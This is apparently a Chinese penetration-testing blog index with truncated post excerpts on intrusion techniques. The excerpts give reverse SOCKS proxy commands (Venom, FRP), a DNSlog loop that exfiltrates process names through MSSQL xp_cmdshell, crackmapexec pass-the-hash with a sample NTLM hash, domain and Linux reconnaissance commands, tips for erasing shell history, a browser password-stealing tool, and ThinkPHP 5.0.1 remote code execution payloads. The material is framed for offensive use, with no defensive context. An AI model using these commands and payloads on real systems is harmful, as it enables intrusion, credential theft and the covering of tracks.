利用venom反向socks代理
2022年01月05日 No comment目标边界: 12.12.12.12 agent.exe ‐rhost 198.118.119.118 ‐rport 9999
攻击机: 198.118.119.118 ./admin_linux_x86 ‐lport 99990x01 攻击机监听./admin_linux_x86 ‐lport 99990x2 靶机反向连接agent.e
阅读全文 »
利用dnslog探测目标进程
2021年12月30日 No comment常用于mssql高权限注入目标主机不岀网利用cmdshell for循环实现for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul用powershell&nb
阅读全文 »
Linux主机信息收集
2021年12月22日 No commentlast 多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像
Ifconfig -a/arp -a/netstat -anopt/ss -nt
ifconfig -a 查看内网ip 网卡 网关
route -n 内网路由情况,也能为内网网络拓扑提供一定的信息
IPtabl
阅读全文 »
Crackmapexec
2021年12月21日 No commentkali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir
阅读全文 »
FRP or reGeorg OR tunna
2021年12月20日 No comment利用Frp反向socks代理流量攻击机: 12.12.12.12 frps.exe ‐c frps.ini 开启监听
目标边界: 27.18.19.98
阅读全文 »
内网抓取密码
2021年12月20日 No comment内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »
Linux提权后总结
2021年08月10日 No comment发行类型 版本在命令前加空格 命令不会被记录
[空格]set +o history 设置命令不被记录
set -o history 恢复记录命令
history -d [num] 删除指定命令行 num指左边序号标示
echo
阅读全文 »
thinkphp 5.0.1的坑
2021年04月18日 No comment判断是否存在http://xxx.com/publics=phpinfo()&_method=__construct&filter=assert
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&
阅读全文 »
获取阿里云机器的外网IP
2020年11月14日 No comment 用于获取 ipconfig 不显示外网IP的机器nslookup myip.opendns.com. resolver1.opendns.com wget http://members.3322.org/dyndns/getip
curl ip.sb
curl ip.cn
阅读全文 »